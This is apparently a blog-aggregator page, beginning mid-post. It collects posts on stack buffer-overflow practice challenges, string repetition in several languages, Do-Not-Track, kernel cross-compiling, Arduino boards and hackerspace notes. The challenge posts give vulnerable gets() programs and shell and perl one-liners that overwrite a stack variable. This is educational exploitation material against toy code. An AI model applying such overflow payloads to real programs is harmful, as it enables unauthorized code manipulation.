    There is no guarantee of how C variables are stored but we can make a good guess. On my system sizeof(int) is 4 and sizeof(char) is always 1 so our stack probably looks like:
    cookie most significant byte
    cookie byte 2
    cookie byte 3
    cookie least significant byte
    Lets try it!

    The string we want to insert is
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxDCBA. 80 random characters to fill the buffer and then DCBA to fill the cookie (the important part)

    [eitan@ByteByte ~/gstack ]%echo $(jot -b x -s '' 80)DCBA > exploit 
    [eitan@ByteByte ~/gstack ]%./a.out <exploit
    buf: bfbfea48 cookie: bfbfea98
    you win!
    A different way:
    Lets say we didn't have the source and that this was some music player we wanted to (legally) jailbreak. If you disassemble the file you could can change the jump address or just remove the jump altogether to avoid the check
    [eitan@ByteByte ~/gstack !130!]%./a.out
    buf: bfbfea48 cookie: bfbfea98
    you win!
    Some notes

    No serious programmer uses gets anymore and real exploits are likely to be harder to create due to OpenBSD's w^x protection, gcc's stack protector, and good coding habits. This was just an intro to the art of exploitation. I plan on following with either the next warming up to the stack challenge or the "esoteric" format string vulnerabilities.

    Update 12/26/10 clarified the goal of the exploit. Explained what "jot" does.

    by Eitan Adler ( at June 25, 2011 04:15 PM

    Repeating characters in multiple languages

    A friend of mine asked me how to repeat a string a specified number of times. There are a few times when ones wants to do this when programing. Here is the "repeating operator" in various languages. I tried to use an operator when possible - but in certain cases I used a function. In all cases I repeat a string followed by a newline.
    The BSDs
    for i in $(jot 1 5);
    do echo -n "Hi";
    echo "";

    Most Linux distributions
    for i in $(seq 1 1 5);
    do echo -n "Hi";
    echo "";

    print "-" x 10;
    print "\n"

    "ab" * 10 Output: 'abababababababababab'
    paste(rep("Hi",5), collapse='')
    [1] HiHiHiHiHi
    print "-" * 10;
    print "\n"

    string repeat "Hi" 5
    repeat 5 printf 'abc';
    echo "";

    update 5/30/11: Thanks to Hans I found out that jot is not POSIX. Also fixed formatting.

    by Eitan Adler ( at June 25, 2011 04:15 PM

    The Usefulness of the X-Do-Not-Track Header

    Do-Not-Track [0] is a recent proposal by the FTC [1] to deal with the problem of users being “tracked” by advertisers. This consists of adding a new HTTP header[2] into page requests that indicates that the user is “opting out” of being “tracked”

    The proposal is backed by a number of major players, including Mozilla [3] , the Electronic Frontier Foundation [4] , Wladimir Palant (the maintainer of of AdBlockPlus)[5] , and Giorgio Maone (the author of NoScript) [6].

    Is this a good idea? Does it solve any existing problems?

    One important factor to consider is that everyone has a different understanding of the concept of “tracking”. If a user has the header set but logs in to a service is there a difference? What if the user closes the browser in between sessions? Can the service remember who logged on last? Can a bank track a user’s visits for security purposes? What about a quiz website tracking participation to prevent cheating? And these are the simple questions. The definition of the word ‘tracking’ is not officially established.

    Google claims it anonymizes IP addresses [7] but the “anonymization only involved clearing the last octet of the user’s IP address.[8] Is that considered tracking? Who decides? You? Google? The government?

    Even if we came to a shared definition of what it means to “track”, how can one prove if tracking is done or not?

    Let’s imagine that the US government enacts a law requiring websites to follow this header based on this elusive definition of “tracking”. What about servers outside the US? How would their activity be handled? What about a foreign user accessing a US based website? The reverse? What if different jurisdictions came to had two mutually exclusive definitions of “tracking”?

    Furthermore, what if websites began to deny service to users that used the X-Do-Not-Track header? Browsers would be forced to remove the header in order to browse the web - effectively nullifying the header’s original purpose.

    Arvind Narayanan [9] says that “Examining ad blocking allows us to predict how publishers, ... assuming DNT is implemented as a browser plug-in, ad blocking and DNT would be equivalent ... ad blocking would result in a far greater decline in revenue than merely preventing behavioral ads. We should therefore expect that DNT will be at least as well tolerated by websites as ad blocking.” This analysis assumes that the header will be in a plugin or optional setting. If every browser implements this header by default, as they should to attract more users, a much larger percentage of people will be opting out than with ad-blockers today.

    What if the law disallowed differing service for those with or without the header? What would be the point? It would make sense to simply disallow “tracking” for all websites, which would make the header moot. Of course, this idea is subject to the same questions as asked above.

    Instead of focusing on silly request-based ideas for websites, browser vendors should be working on fixing the privacy holes that have been already been found. Some examples include Firefox’s fix for the CSS history leak, Internet Explorer’s anti-tracking features [10][11] and related instances

    What if browser vendors could consider idea of shipping their browsers with mini versions of ad-preventing software like AdblockPlus, NoScript[12] , and RequestPolicy[11] that blocked major third party advertisers such as doubleclick. Of course this could become a cat and mouse game - and it may not be a good idea at all - but it would be more effective than the do-not-track header. Other options include appeasing advertises with targeted user advertising and behavior analysis that doesn’t violate user privacy. For examples see the footnote [13]

    Quite simply what we need for increased client side awareness of the privacy implications of various features and some form of control given to the users about what data the transmit across the Internet about themselves.

    [2] Originally the header was “X-Behavioral-Ad-Opt-Out: 1 X-Do-Not-Track: 1” but the current version is now “X-DNT: 1” to save bandwidth
    [12] These particular addons “break” websites by default, but they can be configured in such a way to limit the damage they cause.
    [13] See Profiling and targeting take place in the browser. The ad network is unaware of the user’s interests

    Thank you to JT very much for the sane editing and thoughts provided.

    by Eitan Adler ( at June 25, 2011 04:14 PM

    Warming up to the stack #3

    #include <stdio.h>
    int main() {
      int cookie;
      char buf[80];
      printf("buf: %08x cookie: %08x\n", &buf, &cookie);
      if (cookie == 0x01020005)
        printf("you win!\n");

    Not much is new here. We exploit this the same was we did the first two except that we have a null character (ctrl @).

    I want to point out one thing that I didn't mention on my previous posts. The address of cookie and buf are printed out so we don't really need to "guess" where they are on the stack. I ignored this before, because in real programs, the address values are rarely printed out.

    by Eitan Adler ( at June 25, 2011 04:14 PM

    Warming up to the stack #2

    #include <stdio.h>
    int main() {
      int cookie;
      char buf[80];
      printf("buf: %08x cookie: %08x\n", &buf, &cookie);
      if (cookie == 0x01020305)
        printf("you win!\n");

    Gera's challenge #2 is exactly the same as the first one other than the cookie we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation.

    There are a few ways to deal with this:
    • Take a file similar the original one and use a hex editor, like hexcurse(1), to manually modify it.
    • Use inline perl. perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
    • Directly entering the special characters using ctrl+v followed by a ctrl+key. The key is 0x40 + the value. This won't necessarily work on your terminal due to the Ctrl + C
    %./a.out <exploit
    buf: bfbfe9e8 cookie: bfbfea38
    you win!

    by Eitan Adler ( at June 25, 2011 04:14 PM

    February 13, 2011


    Installing Git on a CentOS 5.5 server

    A lot of people are realizing the benefits of using a distributed version control system such as Git over Svn or Cvs. I won't be discussing the pros and cons, just how I got it installed on a CentOS 5.5 server. If you'd like to install git on a laptop/desktop I suggest you follow the instructions for that at github, this link will redirect to the appropriate OS it detects that you are using, COOL! That page also has many very useful git links in the sidebar.


    by lipcpro at February 13, 2011 07:53 PM

    January 24, 2011

    Tom "supertom" Melendez

    2011: A new year, a new gig.

    It’s been one hell of a year for me. Jaxon is now a year old and doing great. I got to spend alot of time with my family, almost 6 weeks by my count. I did some traveling too: I was in Taiwan for two weeks in May; I spoke at IPC (Germany) in October, and traveled through Bavaria and met some great people. I did some really cool stuff at work. Again, it was a great year.

    But, I think as humans we ultimately can’t leave well-enough alone, and being human (yes, debatable), something needed to change. Due to some personal and professional reasons, I decided to leave Yahoo! to pursue other opportunities. I was there 3 1/2 years and I had some great times. I worked with really smart, passionate people and worked on projects with major impact. Yahoo! was a great experience for me – they moved me out here, gave me fun stuff to work on, allowed me to pursue my technical interests and even do some traveling, all on their dime. For that, I’m very sincere when I say, “Thanks.”.

    So, why did I have to leave? Well, to paraphrase a thoughtful colleague’s blog post, Yahoo! and I had reached a crossroad where I really couldn’t “add” to Yahoo! and pursue my current interests at the same time. There is plenty of work to be done, but for me to take it on would mean me putting aside my own aspirations. While I do believe that my interests and Yahoo!’s immediate needs will converge again one day, it’s just not today, and so, I needed to move on. With all of that said, I really, REALLY want to thank upper management for trying really, really hard to find a position for me that met my needs – Thanks.

    So, what’s next? How can one top working on the Number 1 News site in the world? Work on stuff in space, of course!

    I’m now the Senior Platform Software Engineer at Skybox Imaging. Skybox is a venture-backed startup that’s building satellities (yes, we literally build them in house) better, faster, cheaper and smaller than anyone has before. So what am I doing there? In short, I’m responsible (solely ATM) for storing, processing and serving all of the data (video, photos and text) we get from the satellites.

    This is an awesome opportunity for me for several reasons:

  • I’m building the Hadoop cluster, storage and serving layers from scratch, everything from design to deployment, and much of the code that runs on it.
  • Lots and lots of data, and using Hadoop to process image data is largely-uncharted water at this point.
  • Lots of code to be written – in addition to the above, I’m helping out the flight software team in building the encoder that converts the human readable command manifest into the bits that get radiated to the satellite.
  • This industry is completely new to me, which makes it fun and interesting. I know nothing about space, aeronautics or mechanical engineering. They’ve already let me have at it with some of the tools (they obviously don’t know me too well) and I haven’t hurt anyone yet.
  • And of course, there are the perks:

  • Kegerator
  • Ping-pong/Nerf Guns/Xbox/Team events – all the usual startup stuff
  • Only two miles from my place
  • I literally work with Rocket Scientists.
  • It is going to be a fun year. We’ve got lots of cool toys to play with (we have our first satellite dish *inside* the office) and some serious $$$ behind us. Of course, I’ll miss working with my friends at Y!, but we’re all in the same town and I’m sure we’ll stay in touch. I wish Y! the best and do believe they are now on the right course – 2010 was a planning/design/initial implementation year and 2011 will further implement that vision. And I look forward to the day that Y! News publishes the article describing our first launch – look out for it!

    by supertom at January 24, 2011 04:38 PM

    November 15, 2010

    Jonathan Dahan

    open source hardware conference

    This is first a response to @JxA’s post about the OSHW Definition Draft and second just general thoughts brewing post-OSHW


    Your definition of proto-hardware and hardware could be boiled down to ‘when do I start inviting the world to collaborate?’ . It is a gray area that you probably saw a lot more sharing of at OSHW due to the mutual understanding and passion of the attendees (seriously OSHW was such an awesome time!). Your ‘proto’ seems close to platform, ‘hardware’ close proto + documentation, and ‘product’ close to hardware + usable software + full documentation. At such early stages in design these blur, as there is another type of consumer that has different expectations of ‘the product’.

    A while ago my father asked why open source wasn’t advertised. To make a long story short and relevant to this conversation, we agreed that the maker-consumer cares most about the hackability of a product - to the point that the product doesn’t really have to do anything out of the box. Seeing OSHW-stamped boxes would inform the maker ‘hey do not worry about hacking this thing its gonna be easier and we encourage you to do so!’. This stamp should mean the same thing regardless of the stage of development of the product.

    I am not quite sure where I am going with this, just that although I like the direction your thoughts are going, describing something clearly that is complex necessarily requires complex description. It is why this definition is taking a while to solidify (though it has ‘gelled’ a whole lot in the past few months).

    Defining the goals of the definition will bring about a clearer scope, which can definitely be found through discussion like this.

    If you don’t mind, I would like to link to this post and yours in the forum thread.


    * Outlining the goals of the OSHW definition will make it easier to describe complex things in a clear manner

    * One goal is that compliance should alert makers ‘Hack Me!’ ( though really, shouldn’t everything? )

    November 15, 2010 08:00 AM

    August 26, 2010


    Cross Compile with make-kpkg

    I got myself one of the fancy shmancy netbooks. Due to a habit and some hardware issues I needed to compile a kernel. The problem here though is that it takes for ever to build a kernel on one of these things. No sweat I'll just build it on my desktop, it'll only take 5-10 minutes. But of course there is a catch. My desktop is 64bit and this new machine is an Atom CPU which only does 32bit.

    The process for compiling a 32bit kernel on a 64bit machine is probably a lot easier if you don't compile it the Debian way. But this is not something I want to do, I like installing the kernels through the package manager and doing this type of cross compile using make-kpkg is not trivial. There are plenty of forum and email threads about people recommending to use chroot or virtual machines for this task, but that is such a chore to set up. So here is my recipe for cross compiling 32bit kernel on 64bit host without chroot / vm, the-debian-way.

    1. Install 32bit tools (ia32-libs, lib32gcc1, lib32ncurses5, libc6-i386, util-linux, maybe some other ones)
    2. Download & unpack your kernel sources
    3. run "linux32 make menuconfig" and configure your kernel for your new machine
    4. clean your build dirs "make-kpkg clean --cross-compile - --arch=i386" (only needed on consecutive compiles)
    5. compile your kernel "nice -n 100 fakeroot linux32 make-kpkg --cross-compile - --arch=i386 --revision=05test kernel_image" for faster compilation on multi-CPU machines run "export CONCURRENCY_LEVEL=$((`cat /proc/cpuinfo |grep "^processor"|wc -l`*2))" first
    6. At this point you have a 32bit kernel inside a package labeled for 64bit arch. We need to fix this, run "fakeroot deb-reversion -k bash ../linux-image-". Open the file DEBIAN/control with vim/emacs and change "Architecture: amd64" to "Architecture: i386" exit the bash process with ctrl+d
    7. That's it, now just transfer the re-generated deb to destination machine and install it.

    Many if not all ideas for this process come from reading email threads the comments made by Goswin Von Brederlow were particularly helpful, thanks.

    by dotCOMmie at August 26, 2010 02:09 AM

    July 21, 2010

    Jonathan Dahan

    arduino buyers guide

    Some recommendations since they avr scene has exploded, and arduino-compatable boards rock. I recommend buying from the manufacturer to support them, if they are available in your country. Shield compatability is great, especially if you are starting out. Basic is recommended for your first arduino, advanced is not necessarily more advanced, but an alternative if you have specific requirements.

    $40 * Basic: The Freetronics TwentyTen * Duemilanove + mini usb connector + built in proto board * Advanced: Illuminato Genesis * 42 I/O pins, sweet black pcb with 10 bright white leds, 64K of code space

    $30 * Basic: Deumilanove * The official board is more flexible, since you can change the atmel chip. * Advanced: Seeeduino * The seeeduino is based off the decimilia, not the deumilanove, and improves on the form factor

    $20 * Basic: Arduino Pro * Smaller and cheaper, but missing usb, you will need an serial to usb cable, which is ~$15 * Advanced: BBB * $4 cheaper than the pro, and you get to build it yourself!

    July 21, 2010 07:00 AM

    July 05, 2010

    Jonathan Dahan


    Reduce friction for contribution and consumption * see open source development Offer alternatives to asymmetric balance of information * insurance vs. savings communes Keep in mind the elasticity and limit the numbers * private trackers, constitution

    July 05, 2010 07:00 AM

    July 02, 2010

    Jonathan Dahan


    Going through the speaker list at (thenexthope)(, and seeing how many notes I have written in (tasque)(http://) I realize that I consume more than I can follow up on. Prioritization aside, just getting this down for posterity is important, and what better way than to public random notes on the internet? (Seriously, I need a better scheme than this, preferrable one that following the (antihacking)( idea I posted earlier. This post will probably be split into a few ones later, but its better to push early and often, before this stuff slips away.


    Great convention, organized by JonathanD * Lots of talks involved open education, not just in using FOSS technologies for IT infrastructure, but to take advantage of real world excercises, contributing to code/documentation/art/testing in projects that people actually use. * hkcmp * freebay / nomoola * collectivefoundation * * publiccollectors * collectivefoundation * *

    * From the talk on community management given by kloeri * define what you want from the community early on * changing direction is ok as long as everyone is moving in the same direction * leave trivial bugs as low hanging fruit * be open about exploitation of users to turn them into contributors * take “bad” patches to illustrate ease of contribution * attribute contributions even if the contributor did not do any of the real work * upstream gets contributors <> contributors get credit and learning * users can socially engineer the developers to do work for them! (just pose the question as an interesting problem) * for a good example, see BFS from Con Kovilas

    * POSSE * productively lost is a good thing, stumbling around means you have a greater learning potential * RiT has a good FOSS movement going on, check out the foss@rit projects page! * Professor Stephen rocks, and so does the OLPC

    * Openhatch - job site++ for FOSSheads * Would be cool to add mission badges, integration with statusnet

    * - git history of laws! * Both built on pygears < turbogears2 < moksha


    Music to check out - stuff that sounds good at first glance but I should consider putting into my regular rotation / radio show.

    * fabriclive 50 * faded paper figures * clermont * frog eyes * slothbeat kids * icarus himself * hyperbubble * the humms might have a song that flaming lips took the chord progression for ‘I dont know where the sunbeams end and the starlight begins…’


    Its important to document work, really, really important. Here is a crappy start.

    * Get pics from Prof. Jose * Fix arduinome * Build Problem Light (have a good chassis…)

    July 02, 2010 07:00 AM

    May 14, 2010


    Versionless Distro

    Every six months the internet lights up with stories that Canonical & Co has done the unthinkable they have increased the number following the word Ubuntu. In other words they have release a new version. This is a well understood concept to differentiate releases of software. As the version increases it is expected that new features are introduced and old bugs are removed (hopefully more are removed than added).

    Versioning distributions and releasing the versions separately is a common practice, employed by most if not all distributions out there. Ubuntu has adopted the policy of releasing regularly and quite often. But there is a different approach it revolves around a concept I call "Versionless" where you do not have a hard release but instead let the changes trickle down. In the application world these releases are often called nightly builds. With distributions it is a little bit different.

    First of all its worth noting that distributions are not like applications. Distributions are collection made up by applications and a kernel, the applications that are included are usually stable releases and so the biggest unpredictability comes from the combination and configuration there of. As a result one of the important roles for distro developers is to ensure that the combination of the many applications does not lead to adverse side effects. This is done in several ways, the general method is to mix all the applications in a pot, the so called pre-release and then test the combination. The testing is done by whole community, as users often install these pre-releases to see if they see any quirks through their regular use. When the pre-release becomes stable enough it is pushed out the door as a public release.

    In an ideal world after this whole process all the major bugs and issues would have been resolved and users go on to re-install/update their distribution installations to the new release -- without any issues. The problem is that even if the tests passed with flying colors does not mean that on the user will not experience problems. The more complicated a configuration that a user has the more chances they will notice bugs as part of upgrade. This is particularly evident where there are multiple interacting systems. Doing a full upgrade of a distribution it is not always obvious what change in the update has caused this problem.

    Versionless distributions are nothing new, they has been a staple of Debian for a while. In fact it is the process for testing package compatibility between release, but it is also a lot more. There are two Debian releases that follow this paradigm, Debian Testing and Debian Unstable. As applications are packaged they are added to Debian Unstable and after they fulfill certain criteria, IE they have spent some time in Unstable and have not had any critical bugs filed against them, they are then passed along to Debian Testing. Users are able to balance their needs between new features and stability by selecting the corresponding repository. As soon as the packages are added to the repositories the become immediately available to user for install/upgrade.

    What it really comes down to is testing outside your environment is useful but it cannot be relied solely upon. And when upgrades are performed it is important to know what has changed and how to undo it. Keeping track of changes for 1000's of updates is nearly impossible. So update small and update often, use Debian. Good packages managers are your best friend, but only second to great package developers!

    by dotCOMmie at May 14, 2010 11:03 PM

    April 10, 2010

    Jonathan Dahan


    This is the anti-lifehack.

    By eschewing organization schemes this design pattern forces immediate action.

    No tags, folders or priorities allowed - either deal with item X now, or place it on the bottom of the queue.

    If it seems overwhelming, try determining how much time you would like to work on anything, and find an item that can have measurable progress in that period. I have applied this to my email inbox, rss feeds, and todo lists.

    When applied to my email, I realized I had too many messages incoming. It forced me to unsubscribe from at least a dozen mailing lists, and over 99% of my emails are archived (which means they are dealt with). Zero inbox is attainable but not necessary - set small goals, like reducing the net amount by 5 every day.

    When applied to my rss reader, I realized I had too many feeds, and would really only read a few anyway. I bookmarked the sites that I loved but rarely read, and decided to return to them later. Also, I hid item counts.

    When applied to my todo list, I realized I had more stuff than time to do it in, which forced me to get very good at prioritizing, and picking what needed to be done immediately. This required a bit more dilligence about actually adding stuff to the todo list, though its great to cross off items.

    April 10, 2010 07:00 AM

    December 21, 2009

    Tom "supertom" Melendez

    My Todo List Search

    Having gone through some GTD training recently, I set out on my hunt for the best todo list system for me. First off, let me say that I’m not a GTD purist by any means and in fact have been doing something that somewhat resembles GTD for a few years now, but I certainly like some of its principles. Anyway, here are my (slim) requirements:

    1. Website – no desktop software required.
    2. Mobile Access – ideally IPhone App and must have identical functionality to the website
    3. Concept of Tasks, due dates, and priorities
    4. Repeating tasks is a nice to have
    5. Free is a nice to have

    With those in place, I set out and evaluated these, with some of my brief comments:

    • – mobile interface too simple, you can only view the tasks from your mobile, no updating/deleting
    • (RTM)- probably most suited for my needs, but due to their terms, I’m essentially paying $25 year to support their iphone developer. $25 is what one pays for Flickr, and that is a much more valuable service IMO. The phone app has a 15 day trial.
    • – looks awesome, but doesn’t support priorities, due dates and “tasks” from the web interface from what I can see. I was told that it does do this from the desktop app, but I really want a website and mobile app, that’s it.
    • Errands (iphone app) – I thought this app was great and many people like it, but it has no website to go along with it which means all data entry needs to happen on the phone. I’m not one of these people married to a PIM so this is in the realm of possibility for me, but I ultimately decided I need a website sync up
    • – website plus mobile website, but no priority or due date
    • – iphone plus website, has due dates, but no priorities, but you can sort the list, so that can be your priority. You have to buy the IPhone app, but they have a demo video on the website.
    • – website/mobile website – due date but no priorities, you lose completed items unless you move them to another list, but you can’t move between lists on your mobile device.

    As it stands now, I’m using RTM and am still in the 15 day window. Zenbe Lists is definitely a close second and I’ll reevaluate that before my 15 days expire with RTM.

    by supertom at December 21, 2009 05:53 AM

    November 10, 2009

    Jonathan Dahan

    awesome island labs meeting

    So we had three new faces at Island Labs today. Eric Forkosh is an experienced inventor who brought a cool gsm development board. Mary Ellen Walsh is a charming writer who came to observe our group to help research hackerspaces for Newsday. And Kent (whose last name I cannot remember!) is a friendly and inquisitive photo/videographer that captured the meeting also for Newsday.

    Our corn starch experiments have finally paid off! Laurie donated a speaker that kupo and Tony wrapped with seran wrap. Jonathan hooked up the synth and with the help of justin and kupo got some really crazy shapes and tendrils to dance! Bill explained how non-newtonian fluids work and talked a bit about the near space launch.

    Justin and Jonathan got the arduino to run a test program for a hobby servo, while Jan and Eric worked out some equations on how much torque would be needed to turn the doorknob for the magic door project.

    In the holiday spirit, Chris soldered together an LED electric christmas tree!

    Thanks for everyone who came out, with special thanks to Mary and Kent, who really just let us do our thing, and were great company.

    Pics will be posted soon!

    November 10, 2009 08:00 AM

    October 11, 2009

    Jonathan Dahan